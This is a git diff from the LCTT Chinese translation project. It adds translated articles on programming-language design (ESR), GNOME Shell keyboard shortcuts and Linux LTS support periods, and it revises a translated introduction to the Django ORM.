published/20171118 Language engineering for great justice.md
Normal file
59
published/20171118 Language engineering for great justice.md
Normal file
@ -0,0 +1,59 @@
|
||||
ESR:程序语言设计的要诣和真谛
|
||||
============================================================
|
||||
|
||||
当你真正掌握了整体化的工程设计思维时,你就会发现高屋建瓴的工程设计已经远远超越了技术优化的层面。我们的每一件创造都催生于人类活动的大背景下,被这种人类活动赋予了广泛的经济学意义、社会学意义,甚至于具有了奥地利经济学家所称的“<ruby>人类行为学意义<rt>praxeology</rt></ruby>”。而这种人类行为学意义则是明确的人类行为所能达到的最高层次。
|
||||
|
||||
对我来说这并不只是一种抽象的理论。当我在撰写关于开源项目开发的文章时,文章的内容正是关于人类行为学的 —— 这些文章并不涉及哪个具体的软件技术或者话题,而是在讨论科技所服务的人类行为。从人类行为学角度对科技进行更深入的理解,可以帮助我们重塑科技,并且提升我们的生产力和成就感。这种提升并不总是因为我们有了更新的工具,而更多的是因为我们改变了使用现有工具的思路,提升了我们对这些工具的驾驭能力。
|
||||
|
||||
在这个思路之下,我的随笔文章的第三篇中谈到了 C 语言的衰退和正在到来的巨大改变,而我们也确实能够感受到系统级别编程的新时代的到来。在这里,我会把我的统观见解总结成更具体的、更实用的对计算机语言设计的分析。例如总结出为什么一些语言会成功,另一些语言会失败。
|
||||
|
||||
在我最近的一篇文章中,我写道:所有计算机语言的设计都是对机器资源和程序员人力成本的相对权衡的结果;是对一种相对价值主张的体现。而这些设计思路都是在硬件算力成本不断下降,程序员人力成本相对稳定且可能不减反增的背景下产生的。我还强调了语言设计在实现了一些原有的权衡方案之后,其未来的转化和演变成本在这种语言的成败中所要扮演的一些额外角色。在文中我也阐述了编程语言设计者是如何为当前和可见的未来寻找新的最优设计方案的。
|
||||
|
||||
现在我要集中讲解一下我在上面段落里最后提到的那个概念,即语言设计工程师们其实可以在多个方面来改进和提高现阶段编程语言的设计水准。比如输入系统的优化,GC (垃圾回收机制) 和手动内存分配的权衡,命令导向、函数导向和面向对象导向的混合和权衡。但是站在人类行为学的角度去考量,我认为设计师们一定会做出更简单的设计权衡,即针对近景问题还是针对远景问题来优化一种语言的设计。
|
||||
|
||||
所谓的“远”、“近”之分,是指随着硬件成本的逐渐降低,软件复杂程度的上升和由现有语言向其他语言转化的成本的增加,根据这些因素的变化曲线所做出的判断。近景问题是编程人员眼下看到的问题,远景问题则是指可预见的,但未必会很快到来的一系列情况。针对近景问题的解决方案可以被很快部署下去,且能够在短期内非常有效,但随着情况的变化和时间的推移,这种方案可能很快就不适用了。而远景的解决方案可能因为其自身的复杂和超前性而夭折,或是因其代价过高无法被接受和采纳。
|
||||
|
||||
在计算机刚刚面世的时候, FORTRAN 就是一个近景设计方案, LISP 语言的设计则是针对远景问题;汇编语言多是近景设计方案,很好的阐明了这类设计很适用于非通用语言,同样的例子还包括 ROFF 标记语言。PHP 和 Javascript 则是我们后来看到的采用了近景设计思维的语言。那么后来的远景设计方案有哪些例子呢? Oberon、Ocaml、ML、XML-Docbook 都是它的例子。学术研究中设计出的语言多倾向于远景设计,因为在学术研究领域,原创性以及大胆的假设与想法是很重要的。这和学术研究的动机以及其奖励机制很有关系(值得注意的是,在学术研究中,倾向于远景设计的本源动机并非出于技术方面的原因,而是出自于人类行为,即标新立异才能在学术上有成绩)。学术研究中设计出的编程语言是注定会失败的;因为学术研究的产物常常有高昂的转入成本,无人问津的设计。这类语言也因为在社区中不够流行而不能得到主流的采纳,具有孤立性,且常常被搁置成为半成品。(如上所述的问题正是对 LISP 历史的精辟总结,而且我是以一个对 LISP 语言有深入研究,并深深喜爱它的使用者的身份来评价 LISP 的)。
|
||||
|
||||
一些近景设计的失败案例则更加惨不忍睹。对这些案例来说,我们能够期待的最好的结果就是这种语言可以消亡的相对体面一些,被一种新的语言设计取而代之。如果这些近景设计导向的语言没有死亡而是一直被沿用下去(通常是因为转化成本过高),那么我们则会看到不断有新的特性和功能在这些语言原来的基础之上堆积起来,以保持它们的可用性和有效性。直到这种堆积把这些语言变得越来越复杂,变得危若累卵且不可理喻。是的,我说的就是 C++ 。当然, 还有 Javascript。Perl 也不例外,尽管它的设计者 Larry Wall 有不错的设计品味,避免了很多问题,让这种语言得以存活了很多年。但也正是因为 Larry Wall 的好品味,让他在最终对 Perl 的固有问题忍无可忍之后发布了全新的 Perl 6。
|
||||
|
||||
从这种角度去思考程序语言,我们则可以把语言设计中需要侧重的目标重新归纳为两部分: (1)以时间的远近为轴,在远景设计和近景设计之间选取一个符合预期的最佳平衡点;(2)降低由一种或多种语言转化为这种新语言的转入成本,这样就可以更好地吸纳其它语言的用户群。接下来我会讲讲 C 语言是怎样占领全世界的。
|
||||
|
||||
在整个计算机发展史中,没有谁能比 C 语言在选择远景和近景设计的平衡点的时候做的更完美。事实胜于雄辩,作为一种实用的主流语言,C 语言有着很长的寿命,它目睹了无数个竞争者的兴衰,但它的地位仍旧不可取代。从淘汰它的第一个竞争者到现在已经过了 35 年,但看起来 C 语言的终结仍旧不会到来。
|
||||
|
||||
当然,你可以把 C 语言的持久存在归功于文化惰性,但那是对“文化惰性”这个词的曲解,C 语言一直得以延续的真正原因是因为目前还没有人能提供另一种足够好的语言,可以抵消取代 C 语言所需要的转化成本!
|
||||
|
||||
相反的,C 语言低廉的<ruby>内向转化成本<rt>inward transition costs</rt></ruby>(转入成本)并未引起大家应有的重视,C 语言几乎是唯一的一个极其多样和强大的编程工具,以至于从它漫长统治时期的初期开始,它就可以适用于多种语言如 FORTRAN、Pascal、汇编语言和 LISP 的编程习惯。在一九八零年代我就注意到,我常常可以根据一个 C 语言新人的编码风格判断出他之前在使用什么语言,这也从另一方面证明了 C 语言可以轻松的被其它语言的使用者所接受,并吸引他们加入进来。
|
||||
|
||||
C++ 语言同样胜在它低廉的转化成本。很快,大部分新兴的语言为了降低自身的转入成本,都纷纷参考了 C 语言的语法。值得注意的是这给未来的语言设计带来了一种影响:即新语言的设计都在尽可能的向 C 的语法靠拢,以便这种新语言可以有很低的内向转化成本(转入成本),使其他语言的使用者可以欣然接受并使用这种新语言。
|
||||
|
||||
另一种降低转入成本的方法则是把一种编程语言设计的极其简单并容易入手,让那些即使是没有编程经验的人都可以轻松学会。但做到这一点并非易事。我认为只有一种语言 —— Python —— 成功的做到了这一点,即通过易用的设计来降低内向转化成本。对这种程序语言的设计思路我在这里一带而过,因为我并不认为一种系统级别的语言可以被设计的像 Python 一样傻瓜易用,当然我很希望我的这个论断是错的。
|
||||
|
||||
而今我们已经来到 2017 年末尾,你一定猜测我接下来会向那些 Go 语言的鼓吹者一样对 Go 大加赞赏一番,然后激怒那些对 Go 不厌其烦的人群。但其实我的观点恰恰相反,我认为 Go 本身很有可能在许多方面遭遇失败。Go 团队太过固执独断,即使几乎整个用户群体都认为 Go 需要做出某些方面的改变了,Go 团队也无动于衷,这是个大问题。目前,Go 语言的 GC 延迟问题以及用以平衡延迟而牺牲掉的吞吐量,都可能会严重制约这种语言的适用范围。
|
||||
|
||||
即便如此,在 Go 的设计中还是蕴含了一个让我颇为认同的远大战略目标。想要理解这个目标,我们需要回想一下如果想要取代 C 语言,要面临的短期问题是什么。正如我之前提到的,这个问题就是,随着软件工程项目和系统的不断扩张,故障率也在持续上升,这其中内存管理方面的故障尤其多,而内存管理故障一直是导致系统崩溃和安全漏洞的主要元凶。
|
||||
|
||||
我们现在已经认清,一种语言要想取代 C 语言,它的设计就必须遵循两个十分重要准则:(1)解决内存管理问题;(2)降低由 C 语言向本语言转化时所需的转入成本。从人类行为学的角度来纵观编程语言的历史,我们不难发现,作为 C 语言的准替代者,如果不能有效解决转入成本过高这个问题,那设计者所做的其它部分做得再好都不算数。相反的,如果一种 C 的替代语言把转入成本过高这个问题解决地很好,即使它在其他部分做的不是最好的,人们也不会对这种语言吹毛求疵。
|
||||
|
||||
而 Go 正是遵循了上述两点设计思路,虽然这个思路并不是一种完美无瑕的设计理论,也有其局限性。比如,目前 GC 延迟的问题就限制了 Go 的推广。但是 Go 目前选择了照搬 Unix 下 C 语言的传染战略,把其自身设计成一种易于转入,便于传播的语言。这样它的广泛和快速的传播就会使其迅速占领市场,从而打败那些针对远景设计的看起来更好的语言。
|
||||
|
||||
没错,我所指的这个远景设计方案就是 Rust。而 Rust 的自身定位也正是一种远景和长期的 C 语言替代方案。我曾经在之前的一些文章中解释过我为什么认为 Rust 还没有做好和 Go 展开竞争的准备。TIOBE 和 PYPL 的语言评价指数榜也很好地证明了我对于 Rust 的这个观点。在 TIOBE 上 Rust 从来没有进过前 20 名。而在 TIOBE 和 PYPL 两个指数榜上, Rust 都要比 Go 的表现差很多。
|
||||
|
||||
五年后的 Rust 会发展的怎样还未可知。但如果 Rust 社区的开发人员对这种语言的设计抱着认真投入的态度,并愿意倾听,那么我建议他们要特别重视转入成本的问题。以我个人经历来说,目前由 C 语言转入 Rust 语言的壁垒很高,使人望而却步。如果 Corrode 之类的 Code-lifting 工具只是把 C 语言映射为不安全的 Rust 语言,那么 Corrode 这类工具也是不能解决这种转入壁垒的。或者如果有更简单的方法能够自动注释代码的所有权或生命周期,那么编译器就能把 C 代码直接映射到 Rust,人们也不再需要 Corrode 这一类工具了。目前我还不知道这个问题要如何解决,但我觉得 Rust 社区最好能够找到一种解决方案来代替 Corrode 和其同类工具。
|
||||
|
||||
在最后我想强调一下,Ken Thompson 曾经有过语言设计的辉煌历史。他设计的一些语言虽然看起来只是为了解决近景问题,实际上却具有很高的质量和开放程度,让这些语言同样非常适合远景问题,非常易于被提高和拓展。当然 Unix 也是这样的, 这让我不禁暗自揣测,那些我认为的 Go 语言中乍看上去不利于其远景发展的一些令人担忧烦扰的设计(例如缺乏泛型)也许并没有我想象的那样糟糕。如果确如我所认为的那样,即这些设计会影响 Go 的远景发展,那么恐怕我真的是比 Ken 还要聪明有远见了。但是我并不认为我有那么高明。Go 的前途我们还是只能拭目以待。
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: http://esr.ibiblio.org/?p=7745
|
||||
|
||||
作者:[Eric Raymond][a]
|
||||
译者:[Valoniakim](https://github.com/Valoniakim),[yunfengHe](https://github.com/yunfengHe)
|
||||
校对:[yunfengHe](https://github.com/yunfengHe),[wxy](https://github.com/wxy)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:http://esr.ibiblio.org/?author=2
|
||||
[1]:http://esr.ibiblio.org/?author=2
|
||||
[2]:http://esr.ibiblio.org/?p=7711&cpage=1#comment-1913931
|
||||
[3]:http://esr.ibiblio.org/?p=7745
|
@ -0,0 +1,73 @@
|
||||
你或许不知道的实用 GNOME Shell 快捷键
|
||||
=======================================
|
||||
|
||||
![](https://www.maketecheasier.com/assets/uploads/2017/10/gnome-shortcuts-00-featured.jpg)
|
||||
|
||||
由于 Ubuntu 在 17.10 发行版本中转移到了 GNOME Shell,许多用户可能对那些实用的快捷键以及创建自己的快捷键感兴趣。这篇文章就是介绍这两方面的。
|
||||
|
||||
### 已有的便捷的 GNOME Shell 快捷键
|
||||
|
||||
如果你希望 GNOME 有成百上千种快捷键,你会失望地发现,情况并非如此。快捷键的列表不会太长,而且并不是全部都对你有用,但仍然会有许多快捷键可以用得上的。
|
||||
|
||||
![gnome-shortcuts-01-settings][1]
|
||||
|
||||
可以通过菜单“设置 -> 设备 -> 键盘”访问快捷方式列表。以下是一些不太流行但实用的快捷方式。
|
||||
|
||||
* `Ctrl` + `Alt` + `T` - 这是一个用来启动终端的快捷键组合,你可以在 GNOME 的任何地方使用它。
|
||||
|
||||
我个人经常使用的两个快捷键是:
|
||||
|
||||
* `Alt` + `F4` - 关闭最顶层窗口
|
||||
* `Alt` + `F8` - 调整窗口大小
|
||||
|
||||
大多数人都知道如何用 `Alt` + `Tab` 在打开的应用程序窗口之间进行切换,但是你可能不知道可以使用 `Alt` + `Shift` + `Tab` 在应用程序窗口之间进行反方向切换。
|
||||
|
||||
在切换窗口界面时,另一个有用的组合键是 `Alt` + `~` (`tab` 键上面的一个键)。
|
||||
|
||||
要是你想显示活动概览,你可以用快捷键 `Alt` + `F1`。
|
||||
|
||||
有很多跟工作台有关的快捷键。如果你像我那样不经常使用多个工作台的话,这些快捷键对你来说是没用的。尽管如此,以下几个快捷键还是值得留意的:
|
||||
|
||||
* `Super` + `PageUp` (或者 `PageDown` )移动到上方或下方的工作台
|
||||
* `Ctrl` + `Alt` + `Left` (或 `Right` )移动到左侧或右侧的工作台
|
||||
|
||||
如果在这些快捷键中加上 `Shift` ,例如 `Shift` + `Ctrl` + `Alt` + `Left`,则可以把当前窗口移动到其他工作台。
|
||||
|
||||
另一个我最喜欢是辅助功能中的调整文字大小的快捷键。你可以用 `Ctrl` + `+` (或 `Ctrl` + `-` )快速缩放字体大小。在某些情况下,这个快捷键可能默认是禁用的,所以在尝试之前请先检查一下。
|
||||
|
||||
上述是一些鲜为人知但是十分实用的键盘快捷键。如果你想知道更多实用的快捷键,可以查看[官方 GNOME Shell 快捷键列表][2]。
|
||||
|
||||
### 如何创建自己的 GNOME Shell 快捷键
|
||||
|
||||
如果默认的快捷键不符合你的喜好,可以更改它们或创建新的快捷键。你同样可以通过菜单“设置 -> 设备 -> 键盘”完成这些操作。当你选择想更改的快捷键条目时,下面的对话框就会弹出。
|
||||
|
||||
![gnome-shortcuts-02-change-shortcut][3]
|
||||
|
||||
输入你想要的键盘快捷键组合。
|
||||
|
||||
![gnome-shortcuts-03-set-shortcut][4]
|
||||
|
||||
如果这个快捷键已经被使用,你会得到一个消息。如果没有,只需点击设置,就完成了。
|
||||
|
||||
如果要添加新快捷键而不是更改现有快捷键,请向下滚动,直到看到 “+” 标志,单击它,在出现的对话框中输入新键盘快捷键的名称和快捷键组合。
|
||||
|
||||
![gnome-shortcuts-04-add-custom-shortcut][5]
|
||||
|
||||
GNOME 默认情况下并没有提供大量的 shell 快捷键,上面列出的是一些比较实用的快捷键。如果这些快捷键对你来说不够,你可以随时创建自己的快捷键。
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.maketecheasier.com/gnome-shell-keyboard-shortcuts/
|
||||
|
||||
作者:[Ada Ivanova][a]
|
||||
译者:[imquanquan](https://github.com/imquanquan)
|
||||
校对:[wxy](https://github.com/wxy)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.maketecheasier.com/author/adaivanoff/
|
||||
[1]:https://www.maketecheasier.com/assets/uploads/2017/10/gnome-shortcuts-01-settings.jpg (gnome-shortcuts-01-settings)
|
||||
[2]:https://wiki.gnome.org/Projects/GnomeShell/CheatSheet
|
||||
[3]:https://www.maketecheasier.com/assets/uploads/2017/10/gnome-shortcuts-02-change-shortcut.png (gnome-shortcuts-02-change-shortcut)
|
||||
[4]:https://www.maketecheasier.com/assets/uploads/2017/10/gnome-shortcuts-03-set-shortcut.png (gnome-shortcuts-03-set-shortcut)
|
||||
[5]:https://www.maketecheasier.com/assets/uploads/2017/10/gnome-shortcuts-04-add-custom-shortcut.png (gnome-shortcuts-04-add-custom-shortcut)
|
@ -1,19 +1,19 @@
|
||||
Django ORM 简介
|
||||
============================================================
|
||||
|
||||
### 学习怎么去使用 Python 的 web 框架中的对象关系映射与你的数据库交互,就像你使用 SQL 一样。
|
||||
> 学习怎么去使用 Python 的 web 框架中的对象关系映射与你的数据库交互,就像你使用 SQL 一样。
|
||||
|
||||
|
||||
![Getting to know the Django ORM](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/web-spider-frame-framework.png?itok=Rl2AG2Dc "Getting to know the Django ORM")
|
||||
Image by : [Christian Holmér][10]. Modified by Opensource.com. [CC BY-SA 4.0][11]
|
||||
|
||||
|
||||
你可能听说过 [Django][12],它是一个被称为“完美主义者的最后期限” 的 Python web 框架。它是一匹 [可爱的小矮马][13]。
|
||||
|
||||
Django 的其中一个强大的功能是它的对象关系映射(ORM),它允许你去和你的数据库交互,就像你使用 SQL 一样。事实上,Django 的 ORM 就是创建 SQL 去查询和维护数据库的一个 Python 的方法,并且在一个 Python 方法中获取结果。 我说 _就是_ 一种方法,但实际上,它是一项非常聪明的工程,它利用了 Python 中比较复杂的部分,使得开发过程更容易。
|
||||
Django 的一个强大的功能是它的<ruby>对象关系映射<rt>Object-Relational Mapper</rt></ruby>(ORM),它允许你就像使用 SQL 一样去和你的数据库交互。事实上,Django 的 ORM 就是创建 SQL 去查询和操作数据库的一个 Python 式方式,并且获得 Python 风格的结果。 我说的_是_一种方式,但实际上,它是一种非常聪明的工程方法,它利用了 Python 中一些很复杂的部分,而使得开发者更加轻松。
|
||||
|
||||
在我们开始去了解 ORM 是怎么工作的之前,我们需要一个去操作的数据库。和任何一个关系型数据库一样,我们需要去定义一堆表和它们的关系(即,它们相互之间联系起来的方式)。让我们使用我们熟悉的东西。比如说,我们需要去建立一个有博客文章和作者的博客。每个作者有一个名字。一位作者可以有很多的博客文章。一篇博客文章可以有很多的作者、标题、内容和发布日期。
|
||||
在我们开始去了解 ORM 是怎么工作之前,我们需要一个可以操作的数据库。和任何一个关系型数据库一样,我们需要去定义一堆表和它们的关系(即,它们相互之间联系起来的方式)。让我们使用我们熟悉的东西。比如说,我们需要去建模一个有博客文章和作者的博客。每个作者有一个名字。一位作者可以有很多的博客文章。一篇博客文章可以有很多的作者、标题、内容和发布日期。
|
||||
|
||||
在 Django-ville 中,这个文章和作者的概念可以被称为博客应用。在这个语境中,一个应用是一个自包含一系列描述我们的博客行为和功能的模型和视图。用正确的方式打包,以便于其它的 Django 项目可以使用我们的博客应用。在我们的项目中,博客正是其中的一个应用。比如,我们也可以有一个论坛应用。但是,我们仍然坚持我们的博客应用的原有范围。
|
||||
在 Django 村里,这个文章和作者的概念可以被称为博客应用。在这个语境中,一个应用是一个自包含一系列描述我们的博客行为和功能的模型和视图的集合。用正确的方式打包,以便于其它的 Django 项目可以使用我们的博客应用。在我们的项目中,博客正是其中的一个应用。比如,我们也可以有一个论坛应用。但是,我们仍然坚持我们的博客应用的原有范围。
|
||||
|
||||
这是为这个教程事先准备的 `models.py`:
|
||||
|
||||
@ -36,23 +36,11 @@ class Post(models.Model):
|
||||
return self.title
|
||||
```
|
||||
|
||||
更多的 Python 资源
|
||||
现在,看上去似乎有点令人恐惧,因此,我们把它分解来看。我们有两个模型:作者(`Author`)和文章(`Post`)。它们都有名字(`name`)或者标题(`title`)。文章有个放内容的大的文本字段,以及用于发布时间和日期的 `DateTimeField`。文章也有一个 `ManyToManyField`,它同时链接到文章和作者。
|
||||
|
||||
* [Python 是什么?][1]
|
||||
大多数的教程都是从头开始的,但是,在实践中并不会发生这种情况。实际上,你会得到一堆已存在的代码,就像上面的 `model.py` 一样,而你必须去搞清楚它们是做什么的。
|
||||
|
||||
* [最好的 Python IDEs][2]
|
||||
|
||||
* [最好的 Python GUI 框架][3]
|
||||
|
||||
* [最新的 Python 内容][4]
|
||||
|
||||
* [更多的开发者资源][5]
|
||||
|
||||
现在,看上去似乎有点令人恐惧,因此,我们把它分解来看。我们有两个模型:作者和文章。它们都有名字或者标题。文章为内容设置一个大文本框,以及为发布的时间和日期设置一个 `DateTimeField`。文章也有一个 `ManyToManyField`,它同时链接到文章和作者。
|
||||
|
||||
大多数的教程都是从 scratch—but 开始的,但是,在实践中并不会发生这种情况。实际上,它会提供给你一堆已存在的代码,就像上面的 `model.py` 一样,而你必须去搞清楚它们是做什么的。
|
||||
|
||||
因此,现在你的任务是去进入到应用程序中去了解它。做到这一点有几种方法,你可以登入到 [Django admin][14],一个 Web 后端,它有全部列出的应用和操作它们的方法。我们先退出它,现在我们感兴趣的东西是 ORM。
|
||||
因此,现在你的任务是去进入到应用程序中去了解它。做到这一点有几种方法,你可以登入到 [Django admin][14],这是一个 Web 后端,它会列出全部的应用和操作它们的方法。我们先退出它,现在我们感兴趣的东西是 ORM。
|
||||
|
||||
我们可以在 Django 项目的主目录中运行 `python manage.py shell` 去访问 ORM。
|
||||
|
||||
@ -74,13 +62,13 @@ Type "help", "copyright", "credits" or "license" for more information.
|
||||
|
||||
它导入了全部的博客模型,因此,我们可以玩我们的博客了。
|
||||
|
||||
首先,我们列出所有的作者。
|
||||
首先,我们列出所有的作者:
|
||||
|
||||
```
|
||||
>>> Author.objects.all()
|
||||
```
|
||||
|
||||
我们将从这个命令取得结果,它是一个 `QuerySet`,它列出了所有我们的作者对象。它不会充满我们的整个控制台,因为,如果有很多查询结果,Django 将自动截断输出结果。
|
||||
我们将从这个命令取得结果,它是一个 `QuerySet`,它列出了我们所有的作者对象。它不会充满我们的整个控制台,因为,如果有很多查询结果,Django 将自动截断输出结果。
|
||||
|
||||
```
|
||||
>>> Author.objects.all()
|
||||
@ -88,7 +76,7 @@ Type "help", "copyright", "credits" or "license" for more information.
|
||||
<Author: Jen Wike Huger>, '...(remaining elements truncated)...']
|
||||
```
|
||||
|
||||
我们可以使用 `get` 代替 `all` 去检索单个作者。但是,我们需要一些更多的信息去 `get` 一个单个记录。在关系型数据库中,表有一个主键,它唯一标识了表中的每个记录,但是,作者名并不唯一。许多人都 [重名][16],因此,它不是唯一约束的一个好的选择。解决这个问题的一个方法是使用一个序列(1、2、3...)或者一个通用唯一标识符(UUID)作为主键。但是,因为它对人类并不可用,我们可以通过使用 `name` 来操作我们的作者对象。
|
||||
我们可以使用 `get` 代替 `all` 去检索单个作者。但是,我们需要一些更多的信息才能 `get` 一个单个记录。在关系型数据库中,表有一个主键,它唯一标识了表中的每个记录,但是,作者名并不唯一。许多人都 [重名][16],因此,它不是唯一约束的好选择。解决这个问题的一个方法是使用一个序列(1、2、3 ……)或者一个通用唯一标识符(UUID)作为主键。但是,因为它对人类并不好用,我们可以通过使用 `name` 来操作我们的作者对象。
|
||||
|
||||
```
|
||||
>>> Author.objects.get(name="VM (Vicky) Brasseur")
|
||||
@ -105,7 +93,7 @@ u'VM (Vicky) Brasseur'
|
||||
|
||||
然后,很酷的事件发生了。通常在关系型数据库中,如果我们希望去展示其它表的信息,我们需要去写一个 `LEFT JOIN`,或者其它的表耦合函数,并确保它们之间有匹配的外键。而 Django 可以为我们做到这些。
|
||||
|
||||
在我们的模型中,由于作者写了很多的文章,因此,我们的作者对象可以检查它自己的文章。
|
||||
在我们的模型中,由于作者写了很多的文章,因此,我们的作者对象可以检索他自己的文章。
|
||||
|
||||
```
|
||||
>>> vmb.posts.all()
|
||||
@ -114,8 +102,8 @@ QuerySet[<Post: "7 tips for nailing your job interview">,
|
||||
<Post: "Quit making these 10 common resume mistakes">,
|
||||
'...(remaining elements truncated)...']
|
||||
```
|
||||
|
||||
We can manipulate `QuerySets` using normal pythonic list manipulations.
|
||||
|
||||
我们可以使用正常的 Python 式的列表操作方式来操作 `QuerySets`。
|
||||
|
||||
```
|
||||
>>> for post in vmb.posts.all():
|
||||
@ -126,20 +114,18 @@ We can manipulate `QuerySets` using normal pythonic list manipulations.
|
||||
Quit making these 10 common resume mistakes
|
||||
```
|
||||
|
||||
去实现更复杂的查询,我们可以使用过滤得到我们想要的内容。这是非常微妙的。在 SQL 中,你可以有一些选项,比如,`like`、`contains`、和其它的过滤对象。在 ORM 中这些事情也可以做到。但是,是通过 _特别的_ 方式实现的:是通过使用一个隐式(而不是显式)定义的函数实现的。
|
||||
要实现更复杂的查询,我们可以使用过滤得到我们想要的内容。这有点复杂。在 SQL 中,你可以有一些选项,比如,`like`、`contains` 和其它的过滤对象。在 ORM 中这些事情也可以做到。但是,是通过 _特别的_ 方式实现的:是通过使用一个隐式(而不是显式)定义的函数实现的。
|
||||
|
||||
如果在我的 Python 脚本中调用了一个函数 `do_thing()`,我期望在某个地方有一个匹配 `def do_thing`。这是一个显式的函数定义。然而,在 ORM 中,你可以调用一个 _不显式定义的_ 函数。之前,我们使用 `name` 去匹配一个名字。但是,如果我们想做一个子串搜索,我们可以使用 `name__contains`。
|
||||
如果在我的 Python 脚本中调用了一个函数 `do_thing()`,我会期望在某个地方有一个匹配的 `def do_thing`。这是一个显式的函数定义。然而,在 ORM 中,你可以调用一个 _不显式定义的_ 函数。之前,我们使用 `name` 去匹配一个名字。但是,如果我们想做一个子串搜索,我们可以使用 `name__contains`。
|
||||
|
||||
```
|
||||
>>> Author.objects.filter(name__contains="Vic")
|
||||
QuerySet[<Author: VM (Vicky) Brasseur>, <Author: Victor Hugo">]
|
||||
```
|
||||
|
||||
现在,关于双下划线(`__`)我有一个小小的提示。这些是 Python _特有的_。在 Python 的世界里,你可以看到如 `__main__` 或者 `__repr__`。这些有时被称为 `dunder methods`,是 “双下划线” 的缩写。这里仅有几个非字母数字字符可以被用于 Python 中的对象名字;下划线是其中的一个。这些在 ORM 中被用于不同的过滤关键字的显式分隔。在底层,字符串被这些下划线分割。并且这个标记是分开处理的。`name__contains` 被替换成 `attribute: name, filter: contains`。在其它编程语言中,你可以使用箭头代替,比如,在 PHP 中是 `name->contains`。不要被双下划线吓着你,正好相反,它们是 Python 的好帮手(并且如果你斜着看,你就会发现它看起来像一条小蛇,想去帮你写代码的小蟒蛇)。
|
||||
现在,关于双下划线(`__`)我有一个小小的提示。这些是 Python _特有的_。在 Python 的世界里,你可以看到如 `__main__` 或者 `__repr__`。这些有时被称为 `dunder methods`,是 “<ruby>双下划线<rt>double underscore</rt></ruby>” 的缩写。仅有几个非字母数字的字符可以被用于 Python 中的对象名字;下划线是其中的一个。这些在 ORM 中被用于显式分隔<ruby>过滤关键字<rt>filter key name</rt></ruby>的各个部分。在底层,字符串用这些下划线分割开,然后这些标记分开处理。`name__contains` 被替换成 `attribute: name, filter: contains`。在其它编程语言中,你可以使用箭头代替,比如,在 PHP 中是 `name->contains`。不要被双下划线吓着你,正好相反,它们是 Python 的好帮手(并且如果你斜着看,你就会发现它看起来像一条小蛇,想去帮你写代码的小蟒蛇)。
|
||||
|
||||
ORM 是非常强大并且是 Python 特有的。不过,在 Django 的管理网站上我提到过上面的内容。
|
||||
|
||||
### [django-admin.png][6]
|
||||
ORM 是非常强大并且是 Python 特有的。不过,还记得我在上面提到过的 Django 的管理网站吗?
|
||||
|
||||
![Django Admin](https://opensource.com/sites/default/files/u128651/django-admin.png "Django Admin")
|
||||
|
||||
@ -147,13 +133,13 @@ Django 的其中一个非常精彩的用户可访问特性是它的管理界面
|
||||
|
||||
ORM,有多强大?
|
||||
|
||||
### [django-admin-author.png][7]
|
||||
|
||||
![Authors list in Django Admin](https://opensource.com/sites/default/files/u128651/django-admin-author.png "Authors list in Django Admin")
|
||||
|
||||
好吧!给你一些代码去创建最初的模型,Django 转到基于 web 的门户,它是非常强大的,它可以使用我们前面用过的同样的原生函数。默认情况下,这个管理门户只有基本的东西,但这只是在你的模型中添加一些定义去改变外观的问题。例如,在早期的这些 `__str__` 方法中,我们使用这些去定义作者对象应该有什么?(在这种情况中,比如,作者的名字),做了一些工作后,你可以创建一个界面,让它看起来像一个内容管理系统,以允许你的用户去编辑他们的内容。(例如,为一个标记为 “已发布” 的文章,增加一些输入框和过滤)。
|
||||
好吧!给你一些代码去创建最初的模型,Django 就变成了一个基于 web 的门户,它是非常强大的,它可以使用我们前面用过的同样的原生函数。默认情况下,这个管理门户只有基本的东西,但这只是在你的模型中添加一些定义去改变外观的问题。例如,在早期的这些 `__str__` 方法中,我们使用这些去定义作者对象应该有什么?(在这种情况中,比如,作者的名字),做了一些工作后,你可以创建一个界面,让它看起来像一个内容管理系统,以允许你的用户去编辑他们的内容。(例如,为一个标记为 “已发布” 的文章,增加一些输入框和过滤)。
|
||||
|
||||
如果你想去了解更多内容,[Django 美女的教程][17] 中关于 [the ORM][18] 的节有详细的介绍。在 [Django project website][19] 上也有丰富的文档。
|
||||
如果你想去了解更多内容,[Django 美女的教程][17] 中关于 [the ORM][18] 的节有详细的介绍。在 [Django project website][19] 上也有丰富的文档。
|
||||
|
||||
(题图 [Christian Holmér][10],Opensource.com 修改. [CC BY-SA 4.0][11])
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
@ -165,9 +151,9 @@ Katie McLaughlin - Katie 在过去的这几年有许多不同的头衔,她以
|
||||
|
||||
via: https://opensource.com/article/17/11/django-orm
|
||||
|
||||
作者:[Katie McLaughlin Feed ][a]
|
||||
作者:[Katie McLaughlin][a]
|
||||
译者:[qhwdw](https://github.com/qhwdw)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
校对:[wxy](https://github.com/wxy)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
@ -0,0 +1,55 @@
|
||||
Linux 长期支持版关于未来的声明
|
||||
===============================
|
||||
|
||||
> Linux 4.4 长期支持版(LTS)将得到 6年的使用期,但是这并不意味着其它长期支持版的使用期将持续这么久。
|
||||
|
||||
[视频](http://android-streaming.techrepublic.com/media/2014/10/17/343832643820/1242911146001_1697467424001_zdnet-linux-linus-2point7_1189834_740.mp4)
|
||||
|
||||
_视频: Torvalds 对内核版本 2.6 的弹性感到惊讶_
|
||||
|
||||
在 2017 年 10 月,[Linux 内核小组同意将 Linux 长期支持版(LTS)的下一个版本的生命期从两年延长至六年][5],而 LTS 的下一个版本正是 [Linux 4.14][6]。这对于 [Android][7],嵌入式 Linux 和 Linux 物联网(IoT)的开发者们是一个利好。但是这个变动并不意味着将来所有的 Linux LTS 版本将有 6 年的使用期。
|
||||
|
||||
